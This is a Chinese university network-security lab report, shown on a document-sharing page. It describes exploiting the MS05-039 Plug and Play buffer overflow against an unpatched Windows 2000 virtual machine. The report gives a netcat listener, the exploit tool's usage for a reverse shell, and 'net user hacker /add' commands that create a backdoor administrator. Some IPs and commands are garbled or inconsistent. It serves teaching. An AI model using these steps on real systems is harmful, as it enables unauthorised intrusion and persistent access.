计算机网络安全实验报告06new.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
计算机网络安全实验报告06new.doc

《计算机网络安全》实验报告 实验序号:6          实验项目名称:缓冲区溢出攻击与防范实验 学号 姓名 专业、班 实验地点 实1-411 指导教师 实验时间 2011-11-15 一、实验目的及要求 通过实验掌握缓冲区溢出的原理;通过使用缓冲区溢出攻击软件模拟入侵远程主机;理解缓冲区溢出危险性;理解防范和避免缓冲区溢出攻击的措施。 二、实验设备(环境)及要求 Windows 2000 server,虚拟机. 本实验需要用到虚拟机,因此每台实验主机都通过安装软件WMware Workstation分割出了虚拟机。 真实主机P1的配置为:操作系统Windows 2000 server SP0或者windows XP sp2,并且安装ms05-039.exe缓冲区溢出攻击软件。 虚拟机P2配置为:操作系统Windows2000 Server SP0(没有另外打补丁,存在ms05039漏洞)。 3)实验网络拓扑图 三、实验内容与步骤 缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因在于缓冲区溢出漏洞太普通了,并且易于实现。而且,缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。 实验任务: 利用ms05-039溢出漏洞攻击 MS05-039漏洞是Microsoft Windows即插即用功能远程缓冲区溢出漏洞。Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,造成该漏洞的原因是Plug and Play 服务中未经检查的缓冲区–vv –l –p 99,如图2。 图2 运行nc 进行监听 2)对远程主机进ms05-039漏洞进行入侵 实验在命令行下进行,具体操作如下: (1)运行ms05039scan.exe,如图3,设定探测目标172.16.167.103(实验中以实际虚拟机为准)。 图3 ms05039扫描 (2)点击“”按钮; (3)运行结束后查看结果,此例中表明目标主机有该漏洞,可以进行下一步攻击。 3)攻击 (1)在dos下运行ms05039攻击程序ms0539.exe。ms0539.exe是一个利用远程主机ms05-039漏洞进行溢出的工具,它在命令行下使用,使用格式如下: ms05039.exe host conIP conPort [target] 其中: host :目标主机地址 conIP :回连ip地址,一般就是本地主机ip地址 onPort:回连端口,如该实验中的“99” target :目标系统类型,缺省为1 系统类型有两种: 0:English win2k(sp4) 1 :Chinese win2k (sp4) 我们在命令行下输入:ms05039.exe 172.16.167.101 172.16.167.151,(这表示对172.16.167.103进行远程溢出,溢出后返回的ip是172.16.167.103,返回端口是99,远程主机的操作系统类型是Chinese win2k sp4),如图4所示 图4 执行ms05039攻击 (2)检查我们刚才运行nc的dos窗口,若出现图5所示,则表明攻击成功。此dos窗口中运行的任何命令都是在目标主机上运行,相当于在目标主机本机上开一个dos窗口运行程序一样。 图5 攻击成功的结果 (3)验证。运行 net user hacker /add和net localgroup administrators hacker /add 验证攻击者运行程序的权限,若成功则表明有超级用户权限。成功后可以在目标主机上验证是否添加了用户。 四、实验结果与数据处理 如以上分析结果所示。 五、分析与讨论 通过本次实验基本的掌握缓冲区溢出的原理,知道它是怎样进行攻击的。也能够通过使用缓冲区溢出攻击软件模拟入侵远程主机;明白了缓冲区溢出危险性;并且能够正确的防范和避免缓冲区溢出攻击的措施。在不断的实验中累计了经验,以后遇到这方面的事情处理起来会更加的顺畅。 六、教师评语 签名: 日期: 成绩

文档评论(0)

xinshengwencai + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:5311233133000002

1亿VIP精品文档

相关文档